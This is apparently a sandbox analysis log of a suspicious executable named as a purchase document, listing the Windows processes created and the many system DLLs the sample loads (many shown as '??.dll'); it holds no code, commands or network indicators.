Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown | Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: unknown | Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: url.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: mapi32.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: ??.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: ????.dll
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Section loaded: ???.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: winhttpcom.dll
